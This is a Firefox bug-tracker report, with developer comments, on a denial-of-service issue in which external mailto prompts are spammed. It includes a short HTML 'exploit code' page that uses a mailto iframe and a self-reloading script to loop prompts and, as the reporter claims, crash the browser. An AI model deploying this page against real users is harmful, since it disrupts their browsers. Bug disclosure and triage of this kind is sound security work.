Ahmed Al Ghafri Reporter
	Description • 7 years ago

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Steps to reproduce:

1-. Open the following link in Firefox, 
Test link:
http://beinsecurity.com/DoS_ff.html

2- Infinite loop trying to open email client causing a crash in Firfox.

Exploit code:

<html>
<body>
<!-- Remote DoS vulnerability tested on Firefox Quantum 58.0.1 (Windows 10 64-bit) -->
<iframe src="mailto://al-ghafri@hotmail.com"></iframe>
<script>location.href='DoS_ff.html';</script>
</body>
</html>



Actual results:

Infinite loop trying to open email client causing a crash in Firfox.


Expected results:

detecting the mal loop and ask the user to kill the page

	Frederik Braun [:freddy]
	Comment 2 • 7 years ago

Your attachment has a script of "while (true) do { }", so I used the one in your comment, which seems to make more sense.

But I can't reproduce with either of the following settings.
a) open 'mailto:' URLs in Thunderbird
b) open 'mailto:' URLs unassigned (our own prompt)


All I get is lots of prompts.
How long did you let this run, Ahmed?


I've tested Firefox Release (58.0.1).

	Daniel Veditz [:dveditz]
	Comment 3 • 7 years ago

Tanvi: external app prompt spamming (particularly mailto:) seems like a duplicate of one of the bugs on the eviltraps burn-down list. Do you know which one?

	Tanvi Vyas[:tanvi]
	Comment 4 • 7 years ago

Maybe https://bugzil.la/167475 or https://bugzil.la/424201.  Other options I found - 
https://bugzil.la/331334, https://bugzilla.mozilla.org/show_bug.cgi?id=1361653

	Daniel Veditz [:dveditz]
	Comment 5 • 6 years ago

Not the same external handler, but the same DoS technique.

	Virtual_ManPL [:Virtual] 🇵🇱 - (please needinfo? me - so I will see your comment/reply/question/etc.)
	Comment 6 • 6 years ago

Cleaning per duplicate.